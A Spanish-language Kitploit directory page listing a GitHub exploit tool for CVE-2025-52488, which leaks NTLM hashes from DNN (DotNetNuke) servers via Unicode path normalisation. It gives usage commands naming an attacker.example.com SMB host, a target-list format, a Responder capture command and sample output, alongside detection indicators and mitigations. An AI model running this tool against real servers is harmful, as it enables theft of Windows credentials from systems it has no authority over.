Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-52488 — Este exploit apunta a una vulnerabilidad en DNN (anteriormente DotNetNuke) versiones 6.0.0 hasta antes de 10.0.1 que permite a los atacantes divulgar hashes NTLM mediante ataques de normalización de rutas Unicode. | Kitploit
Herramientas/GitHubGitHub/sh4den/cve-2025-52488
ReconocimientoAtaques de ContraseñasAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de Información
GitHubsh4den/cve-2025-52488

CVE-2025-52488

Este exploit apunta a una vulnerabilidad en DNN (anteriormente DotNetNuke) versiones 6.0.0 hasta antes de 10.0.1 que permite a los atacantes divulgar hashes NTLM mediante ataques de normalización de rutas Unicode.

Ver Repositorio
2hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit de Divulgación de Hash NTLM por Normalización de Rutas Unicode en DNN (CVE-2025-52488)

Resumen

Este exploit apunta a una vulnerabilidad en DNN (anteriormente DotNetNuke) versiones 6.0.0 hasta antes de 10.0.1 que permite a los atacantes divulgar hashes NTLM mediante ataques de normalización de rutas Unicode.

Detalles de la Vulnerabilidad

  • ID de CVE: CVE-2025-52488
  • Gravedad: Alta (CVSS 8.6)
  • Versiones Afectadas: 6.0.0 hasta antes de 10.0.1
  • Vector de Ataque: Red
  • Autenticación: No requerida

Cómo Funciona

El exploit abusa de peculiaridades de Windows/.NET y la normalización Unicode para forzar al servidor DNN objetivo a realizar solicitudes SMB a un servidor controlado por el atacante, exponiendo potencialmente hashes NTLM durante el proceso de autenticación.

Requisitos Previos

  1. Python 3.7+
  2. Paquetes requeridos (instalar con pip install -r requirements.txt)
  3. Servidor SMB para capturar hashes NTLM (ej., Responder, Burp Collaborator)

Uso

Uso Básico

root@kitploit:~
python main.py targets.txt attacker.example.com

Con Parámetros Personalizados

root@kitploit:~
python main.py targets.txt 192.168.1.100 -t 20 --timeout 15

Argumentos

  • targets: Archivo que contiene la lista de hosts DNN (uno por línea)
  • smb_server: Hostname/IP del servidor SMB para capturar hashes NTLM
  • -t, --threads: Número de hilos concurrentes (por defecto: 10)
  • --timeout: Tiempo de espera de solicitud en segundos (por defecto: 10)

Formato del Archivo de Objetivos

Cree un archivo de texto con las URL objetivo, una por línea:

root@kitploit:~
http://target1.example.com
https://target2.example.com:8080
target3.example.com

Configuración del Servidor SMB

Puede usar herramientas como Responder para capturar hashes NTLM:

root@kitploit:~
responder -I eth0 -wrf

O use Burp Collaborator para detección fuera de banda.

Ejemplo de Salida

root@kitploit:~
[2025-01-XX-XX:XX:XX] [INFO] Starting DNN NTLM hash disclosure exploit against 5 targets
[2025-01-XX-XX:XX:XX] [INFO] SMB Server: attacker.example.com
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] DNN indicator found: dnn_IsMobile
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] File upload endpoint accessible
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] Exploit payload sent successfully
[2025-01-XX-XX:XX:XX] [INFO] [target1.com] Check your SMB server for incoming NTLM authentication attempts

Indicadores de Detección

El exploit busca los siguientes indicadores de DNN:

  • cookie dnn_IsMobile
  • dotnetnuke en la respuesta
  • dnnconnect en la respuesta
  • DNN Platform en la respuesta

Mitigación

  • Actualice DNN a la versión 10.0.1 o posterior
  • Implemente controles a nivel de red para evitar solicitudes SMB a servidores externos
  • Monitoree intentos sospechosos de carga de archivos

Descargo de Responsabilidad

Esta herramienta es solo para fines educativos y de pruebas de seguridad autorizadas. Úsela de manera responsable y solo en sistemas que posea o tenga permiso explícito para probar.

Referencias

  • CVE-2025-52488
  • Assetnote Research
Descargar herramienta